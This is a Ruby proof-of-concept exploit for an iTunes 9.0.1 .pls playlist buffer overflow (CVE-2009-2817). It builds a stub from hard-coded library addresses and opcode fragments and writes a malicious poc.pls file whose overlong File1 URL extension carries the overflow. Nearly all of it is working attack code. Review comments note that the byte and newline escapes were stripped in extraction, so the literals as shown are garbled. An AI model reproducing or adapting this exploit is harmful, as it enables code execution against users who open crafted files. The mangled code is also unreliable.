# Title : iTunes 9.0.1 .pls File Handling Buffer Overflow
# Published : 2010-02-17
# Author : S2 Crew
# Exploit Title: iTunes .pls file handling buffer overflow
# Date: 2009.12.20
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: 9.0
# Tested on: OSX 10.5.8, Windows XP SP2? (/GS flag, DOS)
# CVE: CVE-2009-2817
# Code:
#!/usr/bin/env ruby
# Hard-coded absolute addresses consumed by the stub builder below.
# They are fixed for the library layout the author tested against (see the
# "Tested on" header); nothing in this file resolves them at runtime, so the
# PoC depends entirely on that exact layout and is not position-independent.
SETJMP = 0x92F04224
JMP_BUF = 0x8fe31290
STRDUP = 0x92EED110
# 8fe24459 jmp *%eax
# Address of a `jmp *%eax` gadget, per the author's comment above.
JMP_EAX = 0x8fe24459
# Builds the stub string that is placed after the filler in the .pls entry.
#
# It concatenates two short byte fragments (frag0, frag1) with packed
# 32-bit little-endian values taken from the address constants above
# (`pack("V3")` / `pack("V5")` emit unsigned 32-bit LE words).
#
# NOTE(review): the byte-string literals appear to have lost their backslash
# escapes during extraction (e.g. "x90" rather than an escaped byte), so as
# written each literal is plain ASCII text and the inline opcode comments no
# longer describe the bytes actually produced. The same applies to the "n"
# line terminators in the script body below.
#
# @return [String] filler-and-stub string; no arguments, no side effects.
def make_exec_payload_from_heap_stub()
frag0 =
"x90" + # nop
"x58" + # pop eax
"x61" + # popa
"xc3" # ret
frag1 =
"x90" + # nop
"x58" + # pop eax
"x89xe0" + # mov eax, esp
"x83xc0x0c" + # add eax, byte +0xc
"x89x44x24x08" + # mov [esp+0x8], eax
"xc3" # ret
# Layout: frag0, three packed addresses, frag1, 20 bytes of "X" padding,
# five packed addresses, 4 bytes of "X" padding. JMP_BUF + 32 and
# JMP_BUF + 24 are offsets into the same buffer whose base is JMP_BUF.
exec_payload_from_heap_stub =
frag0 +
[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
frag1 +
"X" * 20 +
[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
JMP_EAX].pack("V5") +
"X" * 4
end
# Placeholder command string appended after the stub; the value is arbitrary
# text in this PoC.
payload_cmd = "hereisthetrick"
# NOTE(review): the stub is built twice (here and two lines below) with the
# same result; the first assignment is dead and could be dropped.
stub = make_exec_payload_from_heap_stub()
# 59 filler bytes that precede the stub in the overlong file "extension".
ext = "A" * 59
stub = make_exec_payload_from_heap_stub()
# The whole crafted value is smuggled in as the extension of the File1 URL.
# From a defender's view, an abnormally long extension on a File1= entry is
# the distinguishing feature of this file.
exploit = ext + stub + payload_cmd
# pls file format
# Builds the playlist text line by line. Each `+=` allocates a new String;
# the terminators are written as "n" here, which (as noted above) looks like
# an extraction artifact rather than an actual newline escape.
file = "[playlist]n"
file += "NumberOfEntries=1n"
file += "File1=http://1/asdf." + exploit + "n"
file += "Title1=asdfn"
file += "Length1=100n"
file += "Version=2" + 'n'
# Writes poc.pls in the current directory. `f.puts` appends one newline.
# The explicit `f.close` is redundant: File.open with a block closes the
# handle automatically when the block returns.
File.open('poc.pls','w') do |f|
f.puts file
f.close
end